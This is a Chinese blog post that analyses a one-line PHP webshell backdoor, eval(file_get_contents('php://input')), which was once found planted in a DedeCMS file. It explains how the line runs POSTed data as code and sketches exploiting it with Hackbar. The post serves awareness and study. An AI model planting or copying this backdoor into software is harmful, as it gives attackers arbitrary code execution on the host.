基于php://input一句话PHP木马后门的分析和利用

现在的人越来越不厚道了,不管是漏洞入侵者还是一些无良程序作者竟然在程序中植入非常隐蔽的后门,这次我发现的就是基于php://input一句话php木马后门。这也让想起曾经被发现的dedecms安装文件曾经出过被 植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)

植入的后门代码为:

@eval(file_get_contents('php://input'))

大家都知道eval这个函数太邪恶了,他可以把字符串作为PHP代码执行,搭配php://input简直是赤裸裸的后门啊,对于一般没有经验的管路员,即使看到了,可能都不被注意,那么php://input到底干嘛的呢?

初步发现php://input是用来接收post数据,就是这句话的意思是把post的数据通过file_get_content 获取到然后传递给eval执行php代码,到这里利用方法就知道了,更看出这段代码简直太邪恶了。

php://input(php://input详解

php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活 always_populate_raw_post_data 潜在需要更少的内存。 enctype="multipart/form-data" 的时候 php://input 是无效的。


这是手册上給的解释。

那么怎么利用呢?假如我们把用于测试和学习的脚本名字为:1.php,输入以上后门代码

配合firefox Hackbar插件(这个插件还不错,有兴趣的可以自己试试)测试了一下php://input的功能

1.jpg - 大小: 25.57 KB - 尺寸: 458 x 282 - 点击打开新窗口浏览全图

这句话的意思很明了啊,呵呵,你访问/2.php 的就可以看到我们的目的就可以达到了,基本上可以做任何操作了。其他的,我就不说了,可以任意发挥啊。

声明:本文仅仅作为学习交流,请勿利用做非常操作,否则后果自负哦。

关键词: php木马 , 后门

上一篇: nginx怎么正确的升级新版本,nginx平滑升级的方法
下一篇: Js自动刷新加载CSS 文件-CSSrefresh.js下载和使用方法

目前还没有人评论,您发表点看法?
发表评论

评论内容 (必填):